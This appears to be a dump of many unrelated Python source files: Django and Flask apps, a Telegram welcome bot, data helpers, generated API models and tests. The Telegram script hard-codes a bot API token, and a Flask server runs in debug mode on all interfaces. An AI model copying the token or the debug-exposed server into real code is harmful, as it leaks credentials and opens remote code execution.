    username = forms.CharField(max_length=30)
    # NOTE(review): rendered as a visible text input; a PasswordInput widget
    # is usual here, but adding one would change rendering, so left as-is.
    password = forms.CharField(max_length=30)
class ViewDatadbForm(forms.Form):
    """Form for choosing which company's data to display."""

    # (value, label) pairs for the company dropdown.
    select_choices = (
        ('TCS', 'TCS'),
        ('INFOSYS', 'INFOSYS'),
        ('AMAZON', 'AMAZON'),
        ('FLIPKART', 'FLIPKART'),
    )
    companyname = forms.ChoiceField(choices=select_choices)

    # Kept for reference: an optional sales-period selector.
    # select_choices1 = (('1Year', '1Year'),
    #                    ('2Year', '2Year'))
    # companysales = forms.ChoiceField(choices=select_choices1)
|
23,532 | 2dbd80c3a9b564446f6c1a0ae648cacec32c83be | from flask import Flask, request
import base64
from googletrans import Translator
import main
try:
from PIL import Image
except ImportError:
import Image
import pytesseract
# Module-level singletons: the Flask WSGI app and a shared googletrans client.
app = Flask(__name__)
translator = Translator()
def to_english(text):
    """Translate *text* to English via googletrans and return the text."""
    return translator.translate(text, dest="en").text
@app.route("/", methods=["POST"])
def get_data():
    """Decode a base64 image from the POST form, OCR it, and return the
    extracted text translated to English.

    NOTE(review): the decoded image is written to a fixed path, so
    concurrent requests would clobber each other — confirm single-worker
    deployment or switch to a per-request temp file.
    """
    image = request.form["image"].encode("utf-8")
    # FIX: removed the unused local `IMAGE = "image"` left over here.
    with open("image.png", "wb") as fh:
        fh.write(base64.decodebytes(image))
    stringed_image = to_english(pytesseract.image_to_string("image.png"))
    print(stringed_image)  # debug trace of the OCR+translation result
    return stringed_image
@app.route("/summary", methods=["POST"])
def get_summary():
    """Summarize POSTed `content` down to `count` sentences via main.main()."""
    sents = request.form["count"]
    string = request.form["content"]
    res = main.main(string, int(sents))
    return res
if __name__ == "__main__":
    # NOTE(review): binds to all interfaces with debug=True; the Werkzeug
    # debugger allows remote code execution — do not run this in production.
    app.run("0.0.0.0", 5000, debug=True)
|
23,533 | c6e750a77fe02305c2db81277b91b3fb5cc4ea1c | import time
def to_timestamp(time_str):
    """Convert a 'YYYY-MM-DD HH:MM' string to a local-time UNIX timestamp."""
    return time.mktime(time.strptime(time_str, "%Y-%m-%d %H:%M"))


def is_decreasing(scores_odds):
    """Check that non-purple scores never increase over time.

    scores_odds -- iterable of <time, total score, odd_1, odd_2, is_purple>.

    Returns (True, last_score) when, ordered by timestamp, no score is
    higher than its predecessor; otherwise (False, 0).
    """
    ts_score = {}
    for item in scores_odds:
        if item[4]:  # is_purple: excluded from the trend check
            continue
        ts_score[to_timestamp(item[0])] = item[1]

    # BUGFIX: the original did `ts_array = ts_score.keys(); ts_array.sort()`,
    # which fails on Python 3 (dict views have no .sort()); sorted() is
    # equivalent on Python 2 and 3.
    prev_score = 500
    for ts in sorted(ts_score):
        if prev_score < ts_score[ts]:
            return False, 0
        prev_score = ts_score[ts]
    return True, prev_score
# Row layout: <time, total score, odd_1, odd_2, is_purple>
# Time format example: 2018-02-01 07:05
def test_is_decreasing(a):
    # Python 2 style print statements; this module predates Python 3.
    result, score = is_decreasing(a)
    print " result " + str(result)
    print " score " + str(score)

# expected false: the 07:05 score (100) is higher than the earlier 06:05 one (99)
a1 = [
    ["2018-02-01 07:05", 100, 1, 1, False],
    ["2018-02-01 06:05", 99, 1, 1, False],
    ["2018-02-01 07:06", 99, 1, 1, False],
    ["2018-02-02 07:06", 98, 1, 1, False]]
# test_is_decreasing(a1)

# expected true: the offending 06:05 row is purple and therefore skipped
a2 = [
    ["2018-02-01 07:05", 100, 1, 1, False],
    ["2018-02-01 06:05", 99, 1, 1, True],
    ["2018-02-01 07:06", 99, 1, 1, False],
    ["2018-02-02 07:06", 98, 1, 1, False]]
# test_is_decreasing(a1)

# expected false: scores rise within the time-ordered series
a3 = [
    ["2018-04-01 07:05", 100, 1, 1, False],
    ["2018-02-01 06:05", 99, 1, 1, True],
    ["2018-02-03 06:06", 101, 1, 1, False],
    ["2018-02-02 05:06", 102, 1, 1, False]]
# test_is_decreasing(a1)
def is_decreasing_type_2(scores_odds, allow_inc = 3):
    """Looser decreasing check: allow up to *allow_inc* upticks as long as
    the overall trend is downward (maximum at the first sample, minimum at
    the last).

    Returns (True, last_score) when the series qualifies, else (False, 0).
    Raises IndexError if every entry is purple (empty series), matching
    the original behavior.
    """
    ts_score = {}
    for item in scores_odds:
        if item[4]:  # is_purple: excluded from the trend check
            continue
        ts_score[to_timestamp(item[0])] = item[1]

    # BUGFIX: `dict.keys()` has no .sort() on Python 3; sorted() is
    # equivalent on Python 2 and 3.
    ts_array = sorted(ts_score)

    prev_score = 500
    inc = 0
    max_score = 0
    min_score = prev_score
    for ts in ts_array:
        if prev_score < ts_score[ts]:
            inc = inc + 1
        prev_score = ts_score[ts]
        if prev_score > max_score:
            max_score = prev_score
        if prev_score < min_score:
            min_score = prev_score
    print(" inc " + str(inc))  # debug trace; same output on Python 2 and 3

    first_ts = ts_array[0]
    last_ts = ts_array[len(ts_array) - 1]
    if min_score == ts_score[last_ts] and max_score == ts_score[first_ts]:
        if inc > allow_inc:
            return False, 0
        return True, prev_score
    return False, 0
def test_is_decreasing_2(a):
    # Python 2 style print statements; this module predates Python 3.
    result, score = is_decreasing_type_2(a)
    print " result " + str(result)
    print " score " + str(score)

# Exercise the looser check on the fixtures defined above.
test_is_decreasing_2(a1)
test_is_decreasing_2(a2)
test_is_decreasing_2(a3)
def LiqO2_px_N2(P,T,x_N2):
    """Linear surrogate fit for the liquid-O2 mole fraction.

    Each input is normalized with the fit's offset and scale, a
    first-order polynomial is evaluated, and the result is de-normalized
    (identity scaling for this particular fit).
    """
    # Normalize inputs: (value - offset) / scale.
    p_norm = (P - 5.56999512e+02) / 3.71707300e-01
    t_norm = (T - -1.76911493e+02) / 6.36114000e-02
    n_norm = (x_N2 - 9.01482074e-01) / 1.00892736e-02

    # Constant term plus one linear term per normalized input.
    output = (1*3.84349047e+00
              + n_norm*-6.08739732e-03
              + t_norm*4.11578470e-03
              + p_norm*-7.27500334e-04)

    # De-normalize the fitted output.
    return output*1.00000000e+00 + 0.00000000e+00
23,535 | 928cfbd0c0b98af7d56ba453870d4642c0e1767d | # coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.27.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from pollination_sdk.configuration import Configuration
class Project(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps attribute name -> declared OpenAPI type (used by to_dict()).
    openapi_types = {
        'description': 'str',
        'id': 'str',
        'name': 'str',
        'owner': 'AccountPublic',
        'permissions': 'UserPermission',
        'public': 'bool',
        'slug': 'str',
        'usage': 'Usage'
    }

    # Maps attribute name -> JSON key in the API definition.
    attribute_map = {
        'description': 'description',
        'id': 'id',
        'name': 'name',
        'owner': 'owner',
        'permissions': 'permissions',
        'public': 'public',
        'slug': 'slug',
        'usage': 'usage'
    }

    def __init__(self, description='', id=None, name=None, owner=None, permissions=None, public=True, slug=None, usage=None, local_vars_configuration=None):  # noqa: E501
        """Project - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._description = None
        self._id = None
        self._name = None
        self._owner = None
        self._permissions = None
        self._public = None
        self._slug = None
        self._usage = None
        self.discriminator = None

        # Optional fields are assigned only when provided; required fields
        # always go through their setters, which validate non-None.
        if description is not None:
            self.description = description
        self.id = id
        self.name = name
        self.owner = owner
        self.permissions = permissions
        if public is not None:
            self.public = public
        self.slug = slug
        if usage is not None:
            self.usage = usage

    @property
    def description(self):
        """Gets the description of this Project.  # noqa: E501

        A description of the project  # noqa: E501

        :return: The description of this Project.  # noqa: E501
        :rtype: str
        """
        return self._description

    @description.setter
    def description(self, description):
        """Sets the description of this Project.

        A description of the project  # noqa: E501

        :param description: The description of this Project.  # noqa: E501
        :type description: str
        """
        self._description = description

    @property
    def id(self):
        """Gets the id of this Project.  # noqa: E501

        The project ID  # noqa: E501

        :return: The id of this Project.  # noqa: E501
        :rtype: str
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this Project.

        The project ID  # noqa: E501

        :param id: The id of this Project.  # noqa: E501
        :type id: str
        """
        if self.local_vars_configuration.client_side_validation and id is None:  # noqa: E501
            raise ValueError("Invalid value for `id`, must not be `None`")  # noqa: E501

        self._id = id

    @property
    def name(self):
        """Gets the name of this Project.  # noqa: E501

        The name of the project. Must be unique to a given owner  # noqa: E501

        :return: The name of this Project.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this Project.

        The name of the project. Must be unique to a given owner  # noqa: E501

        :param name: The name of this Project.  # noqa: E501
        :type name: str
        """
        if self.local_vars_configuration.client_side_validation and name is None:  # noqa: E501
            raise ValueError("Invalid value for `name`, must not be `None`")  # noqa: E501

        self._name = name

    @property
    def owner(self):
        """Gets the owner of this Project.  # noqa: E501

        The project owner  # noqa: E501

        :return: The owner of this Project.  # noqa: E501
        :rtype: AccountPublic
        """
        return self._owner

    @owner.setter
    def owner(self, owner):
        """Sets the owner of this Project.

        The project owner  # noqa: E501

        :param owner: The owner of this Project.  # noqa: E501
        :type owner: AccountPublic
        """
        if self.local_vars_configuration.client_side_validation and owner is None:  # noqa: E501
            raise ValueError("Invalid value for `owner`, must not be `None`")  # noqa: E501

        self._owner = owner

    @property
    def permissions(self):
        """Gets the permissions of this Project.  # noqa: E501

        :return: The permissions of this Project.  # noqa: E501
        :rtype: UserPermission
        """
        return self._permissions

    @permissions.setter
    def permissions(self, permissions):
        """Sets the permissions of this Project.

        :param permissions: The permissions of this Project.  # noqa: E501
        :type permissions: UserPermission
        """
        if self.local_vars_configuration.client_side_validation and permissions is None:  # noqa: E501
            raise ValueError("Invalid value for `permissions`, must not be `None`")  # noqa: E501

        self._permissions = permissions

    @property
    def public(self):
        """Gets the public of this Project.  # noqa: E501

        Whether or not a project is publicly viewable  # noqa: E501

        :return: The public of this Project.  # noqa: E501
        :rtype: bool
        """
        return self._public

    @public.setter
    def public(self, public):
        """Sets the public of this Project.

        Whether or not a project is publicly viewable  # noqa: E501

        :param public: The public of this Project.  # noqa: E501
        :type public: bool
        """
        self._public = public

    @property
    def slug(self):
        """Gets the slug of this Project.  # noqa: E501

        The project name in slug format  # noqa: E501

        :return: The slug of this Project.  # noqa: E501
        :rtype: str
        """
        return self._slug

    @slug.setter
    def slug(self, slug):
        """Sets the slug of this Project.

        The project name in slug format  # noqa: E501

        :param slug: The slug of this Project.  # noqa: E501
        :type slug: str
        """
        if self.local_vars_configuration.client_side_validation and slug is None:  # noqa: E501
            raise ValueError("Invalid value for `slug`, must not be `None`")  # noqa: E501

        self._slug = slug

    @property
    def usage(self):
        """Gets the usage of this Project.  # noqa: E501

        The resource consumption of this project  # noqa: E501

        :return: The usage of this Project.  # noqa: E501
        :rtype: Usage
        """
        return self._usage

    @usage.setter
    def usage(self, usage):
        """Sets the usage of this Project.

        The resource consumption of this project  # noqa: E501

        :param usage: The usage of this Project.  # noqa: E501
        :type usage: Usage
        """
        self._usage = usage

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialize list elements that are models.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recursively serialize dict values that are models.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, Project):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, Project):
            return True

        return self.to_dict() != other.to_dict()
|
23,536 | 72e75f6390dad7a6bfef2dd415b56da05a8c8be3 | from scrapy.item import Item, Field
class Bet(Item):
    """Scrapy item describing one scraped betting record with its odds."""
    UUID = Field()
    record = Field()
    bookmaker = Field()
    sport = Field()
    country = Field()
    league = Field()
    eventDate = Field()
    homeTeam = Field()
    awayTeam = Field()
    totals = Field()
    moneyLine = Field()
    spreads = Field()
    home = Field()
    away = Field()
    draw = Field()
    over = Field()
    under = Field()
    hdp = Field()
    points = Field()
    lastUpdated = Field(serializer=str)  # serialized as text on export
|
def count_trees(area, dx, dy):
    """Count '#' cells hit when stepping (dx, dy) from the top-left corner.

    The map wraps horizontally: columns repeat with period len(area[0]).
    Returns the number of '#' cells visited (the start cell included).
    """
    width = len(area[0])
    # Rows visited are 0, dy, 2*dy, ...; at step k the column is (k*dx) % width.
    return sum(
        row[(step * dx) % width] == '#'
        for step, row in enumerate(area[::dy])
    )
with open("input.txt", "r") as f:
    # Drop the last character of each row — assumes every line (including
    # the final one) ends with a newline; TODO confirm for the input file.
    area = [line[:-1] for line in f]
# Slope: right 3, down 1.
print(count_trees(area, 3, 1))
|
23,538 | 0bbf5d7e559cc2219b2e676a964497e6d602d668 | # -*- coding: utf-8 -*-
#
# Copyright 2016 Continuum Analytics, Inc.
# May be copied and distributed freely only as part of an Anaconda or
# Miniconda installation.
#
"""
"""
# Standard library imports
import os
import sys
import yaml
# Local imports
from anaconda_navigator.config import PROJECT_ENVS_FOLDER, PROJECT_YAML_FILE
from anaconda_navigator.utils.logs import logger
class Project(object):
    """
    An Anaconda project.

    Developed as part of Anaconda Navigator, details will initially only
    include information necessary for UI functions.
    """
    # Attribute names included in the dict representation (to_dict/repr).
    keys = ('name', 'default_environment', 'environments', 'commands', 'icon',
            'default_channels', 'is_app', 'dev_tool', 'version',
            'description', 'is_default', 'is_conda_app')
    root = sys.exec_prefix  # If someone runs from within an environment?

    def __init__(self, **kwargs):
        """
        Parameters
        ----------
        name : str
            Project name.
        description : str
            Project description.
        default_environment : str
            Currently selected env name.
        environments : dict
            {envname: specfile} set of env specs.
        commands : list of str
            [strings] executables.
        default_channels : list of str
            [strings] default channels for conda packages.
        is_app : bool
            regard as app?
        dev_tool : bool
            Whether can run other environments.
        icon : str
            Path to icon PNG file.
        is_default : bool
            Defines if the project is the default project.
        """
        self.name = 'default'
        self.description = ""
        self.default_channels = []
        self.version = "0.0.1"
        self.default_environment = 'default'
        self.environments = {'default': 'env.yaml'}
        self.commands = []
        self.icon = None

        # Ui client specifc
        self.is_default = False
        self.is_conda_app = False
        self.dev_tool = None

        # Is this redundant? having an endpoint should imply this?
        self.is_app = False

        # Any keyword argument overrides the defaults above.
        for key, val in kwargs.items():
            setattr(self, key, val)

    def __getitem__(self, item, default=None):
        """Dict-style attribute access with an optional default.

        BUGFIX: removed an unreachable second ``return getattr(self, item)``
        that followed this return in the original code (dead code).
        """
        return getattr(self, item, default)

    get = __getitem__

    def __repr__(self):
        return str(self.to_dict())

    def to_dict(self):
        """
        Dictionary representation of this project.
        """
        return {key: getattr(self, key) for key in self.keys}

    def save(self, path):
        """
        Write project details to file.
        """
        logger.debug(path)
        if not os.path.isdir(path):
            os.makedirs(path)
        data = yaml.safe_dump(self.to_dict(), default_flow_style=False)
        file_path = os.sep.join([path, PROJECT_YAML_FILE])
        with open(file_path, 'w') as f:
            f.write(data)

    def env_prefix(self, path):
        """
        If this project is at path, what's the current env prefix?.
        """
        if self.is_default:
            return self.root  # FIXME: Is this guaranteed to be the right one?
        return os.sep.join([path, PROJECT_ENVS_FOLDER,
                            self.default_environment])
def test():
    """Placeholder for manual testing from the command line."""
    pass


if __name__ == '__main__':
    test()
|
23,539 | f0412a4dc42a0e278690bdd1160ca8daef7791f1 | from twx.botapi import TelegramBot, ReplyKeyboardMarkup
import os
import datetime
import random
import emoji
import socket
import sys
"""
Setup the bot
"""
# NOTE(review): SECURITY — a bot token is hard-coded in source. Revoke it
# and load it from an environment variable or secret store instead.
bot = TelegramBot('808550713:AAHkkh0LkkfX3-j2pHFGED0AEuINIKq-ZnY')
print (bot)
bot.update_bot_info().wait()
last_id = 0
print(bot.username)
# Tuple indices into the entries returned by bot.get_updates().
TELEGRAM_MSGID=0;
TELEGRAM_MSG=1;
"""
Setting up Sensesurround server address
"""
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 10002)
#print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
#sock.connect(server_address)
"""
Send a message to a user
"""
#create objects first
updates = bot.get_updates(offset= last_id, timeout=600).wait()
msg = updates[len(updates)-1][TELEGRAM_MSG]
#result = bot.send_message(user_id, 'test message body').wait()
#print(result)
"""
Get updates sent to the bot
"""
# pmsg holds the previously handled message text (sentinel value first).
pmsg = 'jbufs'
welcome_list = ['Welcome to SNPS! ' + emoji.emojize(":grinning_face_with_big_eyes:"), 'SNPS welcomes you! ' + emoji.emojize("\xF0\x9F\x8D\xBB"), 'Irasshaimase! ' + emoji.emojize("\xF0\x9F\x87\xAF\xF0\x9F\x87\xB5"), 'Hwan-Yeong! ' + emoji.emojize("\xF0\x9F\x87\xB0\xF0\x9F\x87\xB7")]
# Main polling loop: long-poll Telegram, react to keyword messages, and
# proxy "SS weather"/"SS temperature" requests to the Sensesurround socket.
# NOTE(review): the `print >>sys.stderr` statements below are Python 2
# syntax while earlier lines use print(); this script only runs on Python 2.
while True:
    updates = bot.get_updates(offset= last_id, timeout=600).wait()
    if updates is not None:
        if len(updates) > 0:
            msg = updates[len(updates)-1][TELEGRAM_MSG]
            chat= msg.chat
            encodedtext = msg.text
            if encodedtext is not None:
                # NOTE(review): encode() returns a new object which is
                # discarded here, so this call is effectively a no-op.
                encodedtext.encode(encoding='utf-8',errors='ignore')
            #print encodedtext.encode('utf-8')
            encodedpmsg = pmsg
            if encodedpmsg is not None:
                encodedpmsg.encode(encoding='utf-8',errors='ignore')
            #print encodedpmsg.encode('utf-8')
            # NOTE(review): `is not` compares object identity, not string
            # equality; presumably `pmsg != msg.text` was intended — confirm.
            if pmsg is not msg.text:
                #if encodedpmsg is not None:
                #print encodedpmsg.encode('utf-8')
                if len(updates) >= 0:
                    # Advance the offset past the last processed update.
                    last_id = int(updates[len(updates)-1][TELEGRAM_MSGID])+1
                if msg.text is not None:
                    if "adding" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "Adding" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "Let's welcome" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "lets welcome" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "Lets welcome" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "let's welcome" in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "Welcome " in msg.text:
                        bot.send_message(msg.chat.id, random.choice(welcome_list))
                    elif "All the best" in msg.text:
                        bot.send_message(msg.chat.id, "Good Luck..." + "\xF0\x9F\x98\x94")
                    elif "Farewell" in msg.text:
                        bot.send_message(msg.chat.id, "Good Bye..." + "\xF0\x9F\x98\x9E")
                    elif "Take care" in msg.text:
                        bot.send_message(msg.chat.id, "All the best.." + "\xF0\x9F\x99\x8F")
                    elif "SS weather" in msg.text:
                        # Forward the request to the Sensesurround server and
                        # relay every received chunk back to the chat.
                        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
                        sock.connect(server_address)
                        print >>sys.stderr, 'sending "%s"' % msg.text
                        sock.sendall(msg.text)
                        while True:
                            data = sock.recv(16)
                            print >>sys.stderr, 'received "%s"' % data
                            if data:
                                print >>sys.stderr, 'sending "%s" to TG' % data
                                bot.send_message(msg.chat.id, data)
                            else:
                                print >>sys.stderr, 'no more data from SS'
                                sock.close()
                                break
                    elif "SS temperature" in msg.text:
                        # Same relay as "SS weather", for temperature queries.
                        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
                        sock.connect(server_address)
                        print >>sys.stderr, 'sending "%s"' % msg.text
                        sock.sendall(msg.text)
                        while True:
                            data = sock.recv(16)
                            print >>sys.stderr, 'received "%s"' % data
                            if data:
                                print >>sys.stderr, 'sending "%s" to TG' % data
                                bot.send_message(msg.chat.id, data)
                            else:
                                print >>sys.stderr, 'no more data from SS'
                                sock.close()
                                break
                pmsg=msg.text
|
23,540 | 7b5d8b64d4db94834cbc0e9182d494c1cba7c374 | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: __init__.py
Description :
Author: jiangfb
date: 2021-06-23
-------------------------------------------------
Change Activity:
2021-06-23:
-------------------------------------------------
"""
__author__ = 'jiangfb'  # module author metadata
|
23,541 | 201bd8e0c439acd8e10847460b89fd459ca293ea | # nuemeric data types int float and complex
integer_var=-1
float_var=1.0
complex_var=1+2j
print(type(integer_var),type(float_var),type(complex_var),sep="\n")
# playing with lists
# creating an empty list
list_var=[]
# creating a list with some initial values
list_var2=[1,2,'a']
# adding an element to the end of a list
list_var2.append(4)
# adding elements to a list dynamically
for i in range(5):
    list_var.append(i)
print(list_var)
print(list_var2)
# removing the last element from the list
list_var.pop()
print(list_var)
# removing the element at a particular index
list_var.pop(2)
print(list_var)
# removing a given element by value
list_var2.remove('a')
print(list_var2)
# updating the element at a particular index
list_var2[0]='ab'
print(list_var2)
# merging two lists
list_var.extend(list_var2)
print(list_var)
# inserting a value at a particular index
list_var.insert(1,"new")
print(list_var)
# getting the length (size) of the list
print(len(list_var))
# clearing the list (removes all elements)
list_var2.clear()
# deleting values in a particular index range
del list_var[0:3]
print(list_var)
# nested list: a list can contain another list as an element
list_var.append([2,3,4,5,6,7,9])
print(list_var)
# traversing over a list by element
for i in list_var:
    print(i)
# traversing over a list by index
for i in range(0,len(list_var)):
    print(list_var[i])
|
23,542 | 2c9a162d4a45716f93c3f43f6377bdb3dd626759 | from django.db import models
class Product(models.Model):
    """Product with price and manufacture/expiry dates."""
    pid=models.IntegerField()  # presumably an external product id (not the PK) — confirm
    pname=models.CharField(max_length=30)
    pcost=models.DecimalField(max_digits=10,decimal_places=2)
    pmfdt=models.DateField()   # manufacture date
    pexpdt=models.DateField()  # expiry date
|
23,543 | 9bf55657937ba3d6e7d1e4225ff3bae3df3a6ab2 | import aiohttp
import asyncio
import subprocess
import typing
import uuid
async def wait_for_url(client: aiohttp.ClientSession, url: str, method: str):
    """Readiness probe: poll *url* with OPTIONS until the server lists
    *method* in its Allow header, retrying every 0.1 s while the
    connection is refused.
    """
    while True:
        try:
            async with client.options(url) as response:
                if method in response.headers['Allow']:
                    return
        except aiohttp.ClientConnectorError:
            pass
        await asyncio.sleep(0.1)
async def task_producer_run(client: aiohttp.ClientSession, task_type: str, task_payload):
    """Submit one task to the router and assert the payload is echoed back."""
    async with client.post('http://localhost:8080/task/run', params={'taskType': task_type}, json=task_payload) as response:
        assert response.status == 200
        assert await response.json() == task_payload
async def worker_task_gettersetter(client: aiohttp.ClientSession, task_types: typing.List[str], timeout: int):
    """Act as one worker: long-poll for a task of one of *task_types*
    (waiting up to *timeout* seconds), then post its payload back as the
    result.
    """
    async with client.get('http://localhost:8080/task/get', headers={'Prefer': f'wait={timeout}'}, params={'taskType': task_types}) as response:
        assert response.status == 200
        task_payload = await response.json()
    async with client.post('http://localhost:8080/result/set', params={'taskId': task_payload['taskId']}, json=task_payload['payload']) as response:
        assert response.status == 200
async def test_many_tasks_many_workers_steps(test_steps):
    """Spawn the task-router binary and drive it with a scenario.

    test_steps -- list of ('producer'|'worker', amount) pairs, executed in
    order; the total producer and worker counts must balance so every
    awaited task completes.
    """
    process = subprocess.Popen(['task-router'])
    try:
        async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=None, limit_per_host=0)) as client:
            # wait for server to become ready
            await wait_for_url(client, 'http://localhost:8080/task/run', 'POST')
            task_type = 'task-type-under-test'
            producer_tasks = []
            worker_tasks = []
            for type, amount in test_steps:
                print(f'Creating {amount} {type}s...')
                if type == 'producer':
                    for _ in range(amount):
                        producer_tasks.append(
                            asyncio.create_task(
                                task_producer_run(
                                    client,
                                    task_type,
                                    str(uuid.uuid4()),
                                ),
                            ),
                        )
                elif type == 'worker':
                    for _ in range(amount):
                        worker_tasks.append(
                            asyncio.create_task(
                                worker_task_gettersetter(
                                    client,
                                    [task_type],
                                    60,
                                ),
                            ),
                        )
            print(f'Awaiting {len(producer_tasks) + len(worker_tasks)} tasks...')
            assert len(producer_tasks) == len(worker_tasks)
            for task in worker_tasks + producer_tasks:
                await task
            print(f'Awaited {len(producer_tasks) + len(worker_tasks)} tasks.')
    finally:
        try:
            # The router must still be alive at the end of the scenario.
            assert process.poll() is None  # process is still running
            process.terminate()
        finally:
            process.wait()
async def test_many_tasks_many_workers(factor=None):
    """Run several producer/worker interleavings at increasing scale.

    Each scenario balances total producers against total workers; the
    orderings vary which side arrives first to exercise queueing in both
    directions.
    """
    for factor in [1, 10, 33]:
        print('factor:', factor)
        # Producers first, workers catching up.
        await test_many_tasks_many_workers_steps(
            [
                ('producer', 3 * factor),
                ('producer', 3 * factor),
                ('worker', 5 * factor),
                ('producer', 3 * factor),
                ('producer', 3 * factor),
                ('worker', 5 * factor),
                ('producer', 3 * factor),
                ('worker', 5 * factor),
            ],
        )
        # Workers first, producers catching up.
        await test_many_tasks_many_workers_steps(
            [
                ('worker', 5 * factor),
                ('producer', 3 * factor),
                ('worker', 5 * factor),
                ('producer', 3 * factor),
                ('producer', 3 * factor),
                ('worker', 5 * factor),
                ('producer', 3 * factor),
                ('producer', 3 * factor),
            ],
        )
        # Larger producer bursts against smaller worker batches.
        await test_many_tasks_many_workers_steps(
            [
                ('producer', 5 * factor),
                ('worker', 3 * factor),
                ('producer', 5 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('producer', 5 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
            ],
        )
        # All workers waiting before any producer arrives.
        await test_many_tasks_many_workers_steps(
            [
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('producer', 5 * factor),
                ('producer', 5 * factor),
                ('producer', 5 * factor),
            ],
        )
        # All producers queued before any worker arrives.
        await test_many_tasks_many_workers_steps(
            [
                ('producer', 5 * factor),
                ('producer', 5 * factor),
                ('producer', 5 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
                ('worker', 3 * factor),
            ],
        )
|
23,544 | b083769182fd9244967bdec69621e5a7f5926441 | from django.urls import path, include
from .views import *
# URL routes for college CRUD views.
urlpatterns = [
    path('college/list', CollegeListView.as_view(), name="college list"),
    path('college/add/edit', CollegeAddEdit.as_view(), name="college add"),
    path('college/delete', CollegeDelete.as_view(), name="college delete"),
    path('college/details', CollegeDetail.as_view(), name="college detail"),
    # path('college/statuschange', CollegeStatusChange.as_view(), name="college status change"),
]
23,545 | a2c1d9434a7eeb8e92443d4515c3363227d97829 | import operator
import re
import copy
from functools import reduce
from django.db.models import Q, Case, When, Value, IntegerField
from django.db.models.functions import Lower, Substr
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render
from django.shortcuts import render
from django.views.generic import CreateView, DetailView, ListView, UpdateView
from rest_framework import serializers
from classes.models import Department, Class
from fcq.models import Professor, FCQ
from .forms import SearchForm
from .serializers import ProfessorSerializer
# Create your views here.
def fcq_search(request):
    """Render the FCQ search page with an empty search form."""
    context = {"form": SearchForm()}
    return render(request, "fcq/fcq_search.html", context)
def fcq_search_ajax(request):
    """AJAX endpoint: search professors by name keywords, optionally
    filtered by department code and course number.

    Returns the matching professors serialized as a JSON array, or an
    empty JSON object when the requested department does not exist
    (kept as-is for backward compatibility with the existing client).
    """
    if request.method == "GET":
        get = request.GET.get
    else:
        get = request.POST.get

    keyword = get("keyword", "")
    # FIX: use a raw string for the regex ("\W" is an invalid escape
    # sequence warning on modern Python). Every token must match either
    # the first or last name.
    keyword = re.split(r"\W", keyword)
    professors = Professor.objects.filter(
        reduce(
            operator.and_,
            ((Q(firstName__icontains=x) | Q(lastName__icontains=x)) for x in keyword),
        )
    )

    department = get("department")
    if department:
        department_obj = Department.objects.filter(code__iexact=department).first()
        if not department_obj:
            # return no results if department is not found
            return JsonResponse({})
        else:
            professors = professors.filter(
                fcqs__course__department__code=department
            ).distinct()

    number = get("number")
    if number:
        # FIX: removed a leftover debug print of the parsed number.
        professors = professors.filter(fcqs__course__course_subject=int(number))

    response = ProfessorSerializer(professors, many=True)
    return JsonResponse(response.data, safe=False)
def view_professor(request, professor_id):
    """Render the detail page for one professor with aggregate FCQ stats.

    Computes averages (class size, effectiveness, rating, course rating,
    challenge, amount learned) over all of the professor's FCQs, a star
    score, and per-department counts for the pie chart.
    """
    ctx = {}
    professor_id = int(professor_id)  # fix parameter type
    professor_obj = get_object_or_404(
        Professor, id=professor_id
    )  # get professor object

    # get professor's basic info
    professorID = professor_obj.id
    ctx["professor_id"] = professor_obj.id
    ctx["firstName"] = professor_obj.firstName
    ctx["lastName"] = professor_obj.lastName

    # get all fcqs for professor
    fcq = FCQ.objects.filter(professor_id=professorID)
    count = len(fcq)
